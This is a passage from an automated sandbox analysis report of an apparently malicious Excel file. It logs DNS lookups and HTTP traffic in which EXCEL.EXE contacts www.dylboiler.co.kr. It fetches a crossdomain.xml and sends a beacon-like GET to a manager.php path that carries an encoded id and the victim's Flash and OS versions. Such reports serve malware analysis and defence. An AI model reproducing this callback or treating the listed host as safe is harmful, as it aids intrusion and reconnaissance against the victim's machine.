Feb 3, 2018 19:03:48.711335897 CET8049173114.108.131.63192.168.2.3
Feb 3, 2018 19:03:49.615161896 CET8049173114.108.131.63192.168.2.3
Feb 3, 2018 19:03:49.615183115 CET8049173114.108.131.63192.168.2.3
Feb 3, 2018 19:03:49.615437984 CET4917380192.168.2.3114.108.131.63
Feb 3, 2018 19:03:49.615576982 CET4917380192.168.2.3114.108.131.63
Feb 3, 2018 19:03:49.615593910 CET8049173114.108.131.63192.168.2.3

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Feb 3, 2018 19:03:45.458077908 CET6375853192.168.2.38.8.8.8
Feb 3, 2018 19:03:46.480983019 CET6375853192.168.2.38.8.8.8
Feb 3, 2018 19:03:47.413377047 CET53637588.8.8.8192.168.2.3
Feb 3, 2018 19:03:47.413408995 CET53637588.8.8.8192.168.2.3

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Feb 3, 2018 19:03:45.458077908 CET192.168.2.38.8.8.80xc29eStandard query (0)www.dylboiler.co.krA (IP address)IN (0x0001)
Feb 3, 2018 19:03:46.480983019 CET192.168.2.38.8.8.80xc29eStandard query (0)www.dylboiler.co.krA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Feb 3, 2018 19:03:47.413377047 CET8.8.8.8192.168.2.30xc29eNo error (0)www.dylboiler.co.kr114.108.131.63A (IP address)IN (0x0001)
Feb 3, 2018 19:03:47.413408995 CET8.8.8.8192.168.2.30xc29eNo error (0)www.dylboiler.co.kr114.108.131.63A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • www.dylboiler.co.kr

HTTP Packets

Session IDSource IPSource PortDestination IPDestination PortProcess
0192.168.2.349172114.108.131.6380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
Feb 3, 2018 19:03:47.468636990 CET1OUTGET /crossdomain.xml HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.dylboiler.co.kr
Connection: Keep-Alive
Feb 3, 2018 19:03:48.668015957 CET1INHTTP/1.0 200 OK
Date: Sat, 03 Feb 2018 18:03:47 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 04 Dec 2017 11:22:31 GMT
ETag: "10616fc-156-55f81ef2c73a7"
Accept-Ranges: bytes
Content-Length: 342
Connection: close
Content-Type: text/xml
Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 20 53 59 53 54 45 4d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 63 72 6f 6d 65 64 69 61 2e 63 6f 6d 2f 78 6d 6c 2f 64 74 64 73 2f 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 2e 64 74 64 22 3e 0d 0a 3c 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 3e 0d 0a 20 20 20 20 3c 73 69 74 65 2d 63 6f 6e 74 72 6f 6c 20 70 65 72 6d 69 74 74 65 64 2d 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 69 65 73 3d 22 61 6c 6c 22 2f 3e 0d 0a 20 20 20 20 3c 61 6c 6c 6f 77 2d 61 63 63 65 73 73 2d 66 72 6f 6d 20 64 6f 6d 61 69 6e 3d 22 2a 22 20 74 6f 2d 70 6f 72 74 73 3d 22 2a 22 20 2f 3e 0d 0a 20 20 20 20 3c 61 6c 6c 6f 77 2d 68 74 74 70 2d 72 65 71 75 65 73 74 2d 68 65 61 64 65 72 73 2d 66 72 6f 6d 20 64 6f 6d 61 69 6e 3d 22 2a 22 20 68 65 61 64 65 72 73 3d 22 2a 22 20 2f 3e 0d 0a 3c 2f 63 72 6f 73 73 2d 64 6f 6d 61 69 6e 2d 70 6f 6c 69 63 79 3e
Data Ascii: <?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" to-ports="*" /> <allow-http-request-headers-from domain="*" headers="*" /></cross-domain-policy>


Session IDSource IPSource PortDestination IPDestination PortProcess
1192.168.2.349173114.108.131.6380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
TimestampkBytes transferredDirectionData
Feb 3, 2018 19:03:48.711327076 CET2OUTGET /admincenter/files/boad/4/manager.php?id=2D49A8E6CD252385FABA5177F88EAF0F544858D11A14D6EC48493805834A643609AAAF57E793AB7C6C6840BEDDA9FF3F6A17B26861193875A25F903453C53309D47AA736F561515967B78B3671F7F6B7E4FA113151630BE9793AD6D705D77DAA7802B70C&fp_vs=WIN%2016.0,0,235&os_vs=Windows%207 HTTP/1.1
Accept: */*
Accept-Language: en-US
x-flash-version: 16,0,0,235
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: www.dylboiler.co.kr
Connection: Keep-Alive
Feb 3, 2018 19:03:49.615161896 CET3INHTTP/1.0 404 Not Found
Date: Sat, 03 Feb 2018 18:03:48 GMT
Server: Apache/2.2.15 (CentOS)
Content-Length: 353
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 63 65 6e 74 65 72 2f 66 69 6c 65 73 2f 62 6f 61 64 2f 34 2f 6d 61 6e 61 67 65 72 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admincenter/files/boad/4/manager.php was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: EXCEL.EXE PID: 3584 Parent PID: 3236

General

Start time:19:03:26
Start date:03/02/2018
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /dde
Imagebase:0x2fb40000
File size:20392608 bytes
MD5 hash:716335EDBB91DA84FC102425BFDA957E
Programmed in:C, C++ or other language
Reputation:moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >